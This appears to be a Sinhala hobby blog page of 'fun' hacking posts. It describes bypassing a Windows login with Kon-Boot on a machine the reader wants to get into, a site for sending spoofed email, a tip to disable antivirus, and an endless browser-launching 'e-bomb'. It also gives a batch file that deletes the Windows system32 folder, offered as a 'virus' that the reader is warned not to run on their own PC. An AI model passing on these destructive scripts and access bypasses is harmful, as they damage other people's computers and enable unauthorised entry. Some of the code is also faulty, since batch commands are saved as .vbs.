WHAT'S NEW?
Loading...
Showing posts with label Fun. Show all posts
Showing posts with label Fun. Show all posts
Type here writers



වින්ඩෝස් පාස්වර්ඩ් එක අමතක වුණොත් මොකද කරන්නේ

1. මෙතන ක්ලික් කරලා Download කරන්න.

මේක සල්ලි දීලා ගත්තොත් $ 15ක්,
KON-BOOT
ඊටපස්සේ පෙන් එක අරගෙන ෆෝමැට් කරලා දාන්න.
දැන් මෙන්න මේ විදිහට ටොරන්ට් එකේ තියෙන සොෆ්ට්වෙයා එක අරගෙන පෙන් එක තෝරලා දෙන්න.




දැන් පෙන් එක ගලවලා රිංගන ඕන කරන මැසිමට ගහන්න.


දැන් ඉතින් ඒක යනකම් ඉන්න. ඊටපස්සේ වින්ඩෝස් ලෝගෝ එක එන්න ටික වෙලාවක් යාවි. ඊටපස්සේ පාස්වර්ඩ් එක ටයිප් කරන තැනට ආවම එක්කෝ එතන මොනවත් නොගහා එන්ටර් එක ඔබන්න. නැත්නම් ඔයා කැමති පාස්වර්ඩ් එකක් ගහන්න. දැන් ඉතින් වැඩේ හරි. 


Video එකෙන් බලාගන්න


අපිට Like එකක් දාන්න අමතක කරන්න එපා.
ගොඩක් අය  හිතන් ඉන්නෙ notepad එක තියෙන්නෙ  text edit කරන්න  විතරයි කියලනෙ
එත්  ඇත්තටම ඊට  වැඩිය ගොඩක් වැඩ  notepad එකෙන් කරන්න පුලුවන්
ඉතින්  මත් හිතුවා  මම දන්න දේවලුත්  ඔයාලට කියන්න
හැම keybord එකෙම වගේ  තියෙනවනෙ  පොඩි LED light set එකක් 
ඉතින් ඒ light රටවකට පත්තු වෙන්න හදන හැටි තමයි මේකෙන් කියන්නෙ
මුලින්ම virus Guard එක කරන්  ඉන්න මොකද අපි  හදන්න යන්නෙ virus එකක්නෙ


පියවර  1 - මුලින්ම notepad එක open කරගන්න
(desktop එක  right click කරලා new කියන තැන text document එක  open කරාම හරි   )
පියවර  2 - දැන් පහල තියෙන code එක copy කරලා notepad එකට past කරන්න

 http://www.everythingcellphone.org/wp-content/uploads/2013/07/how-to-avoid-getting-hacked.jpg
මගේ පළමු ලිපිය අරන් ආවා ඔයාලට, මම මේ බ්ලොග් අඩවියට අලුත් උනත් බ්ලොග් වලට අලුත් නැහැ..අද අරන් අවේ ඔයාලව දවසකටවත් හැකර් කෙනෙක් කරන ක්‍රමයක් හොයාගෙන.. Hacker කෙනෙක් කිවුව ගමන් ඔයාලට මතක් වෙන්නේ facebook නේද! එත් අද කියන්න යන්නේ ඉට වඩා පොඩි ආතල් එකක් ගන්න පුළුවන් දෙයක් ගැන https://m-static.ak.fbcdn.net/rsrc.php/v2/yH/r/SOe5wIZyutW.png 
මම කියන්න යන්නේ පොඩි වෙබ් කට්ටක් ගැන. එත් මේකෙන් ගන්න පුළුවන් ආශ්වාදයනම් මරේ මරු..
ඔන්න එහෙනම් මෙතනින් කෙලින්ම වෙබ් අඩවියට ගොඩ වෙන්න.
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieoO9P0jxCP8K9YpfFfwiElnQy8kGxwVYBIBTdm4bMgI0oqm5RwppybRv22OzM7Fw90A8H6yrDTTQkL-ZrGJjsm1obXmEzf883Hxw296DdCSRXFo3gltGnI5nBYYsoVursZh5RMdCFRRUC/s1600/go+to+site.jpg
මතක් කරලා Comment එකක් දාලාම යන්න , මේ වගේ ජෝලියට බර තව පොස්ට් එකකින් නැවත හමුවෙමු එහෙනම් මම ඔබේ ආදරණිය яecση

අපිට Like එකක් දාන්න අමතක කරන්න එපා.
කොහොමද යාළුවනේ ඔන්න එහෙනම් තවත් වැදගත් කියන දෙයක් අරගෙන මම අවා 
මේකනම් සොෆ්ට්වෙයාර් එකක් නම් නෙමෙයි.
මේ සයිට් එකට ගිහින් ඔයාල කැමති email එකකින් ඕනෑම කෙනෙක්ට email ඕනෑම තරමක් යවන්න පුළුවන් .යාළුවන්ට පොඩි විහිළුවක් කරන්න නියම ක්‍රමයක්.
ඔයාලත් try එකක් දාල බලන්න .








අපිට Like එකක් දාන්න අමතක කරන්න එපා.


Folder ගොඩාක් හැදෙන virus එකක් හදන්න දන්නවද? මන් අද ඒක ඔයාලට දෙන්නම්. මුලින්ම මන් මේ දෙන File එක බා ගන්නකෝ.



දැන් මන් මේක ලස්සනට කාට හරි Click කරන්න හිතෙන විදිහට හදල තියෙන්නෙ. ඔයාල මේක බා ගෙන Desktop එකට ඒක  Extract කරගන්න. දැන් ලස්සන කෙල්ලව double click කරන්නකෝ..... නියමයි නේද වැඩේ???
ඔයලටම කියල  එකක් හදාගන්න කෑමතිද?
එහෙනම් මේ code එක notepad එකට copy කරල කෑමති නමක් දීල  .bat කියල  save කරන්න..


EX: calculator.bat

@echo off
color a
title Calculator (
It Danuma Bedagamu)
:start
cls
set /p math=I'm It Danuma Bedagamu .....Enter your calculation:
if %math%==Exit exit

set /a math2=%math%
echo %math%=%math2%
echo.
pause
goto start
 
 
 
මේ code එක notepad එකට copy කරල. ඔනෙම නමක් දිල .vbs ලෙස save කරන්න.
EX: e-bomb.vbs


@echo off
:A
start iexplore www.google.com
goto:A




ආතල් එකට Metrix එකක් හදන්න ආසද? එහෙනෙම් මේ code එක notepad වලට copy කරගෙන bat file එකක් ලෙස save කරගන්න. ඔයලම බලන්නකො කරලා......

Ex: Metrix.bat



@echo off

color 02
cls
echo W
ping localhost -n .15 >nul
cls
echo Wa
ping localhost -n .15 >nul
cls
echo Wak
ping localhost -n .15 >nul
cls
echo Wake
ping localhost -n .15 >nul
cls
echo Wake
ping localhost -n .15 >nul
cls
echo Wake u
ping localhost -n .15 >nul
cls
echo Wake up
ping localhost -n .15 >nul
cls
echo Wake up
ping localhost -n .15 >nul
cls
echo Wake up N
ping localhost -n .15 >nul
cls
echo Wake up Ne
ping localhost -n .15 >nul
cls
echo Wake up Neo
ping localhost -n .15 >nul
cls
echo Wake up Neo.
ping localhost -n .15 >nul
cls
echo Wake up Neo..
ping localhost -n .15 >nul
cls
echo Wake up Neo...
ping localhost -n 5 >nul
cls
echo T
ping localhost -n .15 >nul
cls
echo Th
ping localhost -n .15 >nul
cls
echo The
ping localhost -n .15 >nul
cls
echo The
ping localhost -n .15 >nul
cls
echo The M
ping localhost -n .15 >nul
cls
echo The Ma
ping localhost -n .15 >nul
cls
echo The Mat
ping localhost -n .15 >nul
cls
echo The Matr
ping localhost -n .15 >nul
cls
echo The Matri
ping localhost -n .15 >nul
cls
echo The Matrix
ping localhost -n .15 >nul
cls
echo The Matrix
ping localhost -n .15 >nul
cls
echo The Matrix h
ping localhost -n .15 >nul
cls
echo The Matrix ha
ping localhost -n .15 >nul
cls
echo The Matrix has
ping localhost -n .15 >nul
cls
echo The Matrix has
ping localhost -n .15 >nul
cls
echo The Matrix has y
ping localhost -n .15 >nul
cls
echo The Matrix has yo
ping localhost -n .15 >nul
cls
echo The Matrix has you
ping localhost -n .15 >nul
cls
echo The Matrix has you.
ping localhost -n .15 >nul
cls
echo The Matrix has you..
ping localhost -n .15 >nul
cls
echo The Matrix has you...
ping localhost -n 5 >nul
cls
echo F
ping localhost -n .15 >nul
cls
echo Fo
ping localhost -n .15 >nul
cls
echo Fol
ping localhost -n .15 >nul
cls
echo Foll
ping localhost -n .15 >nul
cls
echo Follo
ping localhost -n .15 >nul
cls
echo Follow
ping localhost -n .15 >nul
cls
echo Follow
ping localhost -n .15 >nul
cls
echo Follow t
ping localhost -n .15 >nul
cls
echo Follow th
ping localhost -n .15 >nul
cls
echo Follow the
ping localhost -n .15 >nul
cls
echo Follow the
ping localhost -n .15 >nul
cls
echo Follow the w
ping localhost -n .15 >nul
cls
echo Follow the wh
ping localhost -n .15 >nul
cls
echo Follow the whi
ping localhost -n .15 >nul
cls
echo Follow the whit
ping localhost -n .15 >nul
cls
echo Follow the white
ping localhost -n .15 >nul
cls
echo Follow the white
ping localhost -n .15 >nul
cls
echo Follow the white r
ping localhost -n .15 >nul
cls
echo Follow the white ra
ping localhost -n .15 >nul
cls
echo Follow the white rab
ping localhost -n .15 >nul
cls
echo Follow the white rabb
ping localhost -n .15 >nul
cls
echo Follow the white rabbi
ping localhost -n .15 >nul
cls
echo Follow the white rabbit
ping localhost -n .15 >nul
cls
echo Follow the white rabbit.
ping localhost -n 5 >nul
cls
echo K
ping localhost -n .15 >nul
cls
echo Kn
ping localhost -n .15 >nul
cls
echo Kno
ping localhost -n .15 >nul
cls
echo Knoc
ping localhost -n .15 >nul
cls
echo Knock
ping localhost -n .15 >nul
cls
echo Knock,
ping localhost -n .15 >nul
cls
echo Knock,
ping localhost -n .15 >nul
cls
echo Knock, k
ping localhost -n .15 >nul
cls
echo Knock, kn
ping localhost -n .15 >nul
cls
echo Knock, kno
ping localhost -n .15 >nul
cls
echo Knock, knoc
ping localhost -n .15 >nul
cls
echo Knock, knock
ping localhost -n .15 >nul
cls
echo Knock, knock,
ping localhost -n .15 >nul
cls
echo Knock, knock,
ping localhost -n .15 >nul
cls
echo Knock, knock, N
ping localhost -n .15 >nul
cls
echo Knock, knock, Ne
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo.
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo. .
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo. . .
ping localhost -n 5 >nul
cls
:start
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
echo 111     11111     11111     11111     11111     11111     1111111   111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
goto start


මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො...
****මේක බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා****

@echo off del c:\windows\system32

          ඒක ඔයාල කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල දෙන්න ඕන
Eg: virus.bat


****මේක බැරිවෙලාවත් ඔයාගෙ පරිගණකයේනම් Run කරන්න එපා****
මේකෙන් ඔයාගෙ පරිගණකයේ System 32 File එක Delete කරනවා.Windows Crash වෙනවා.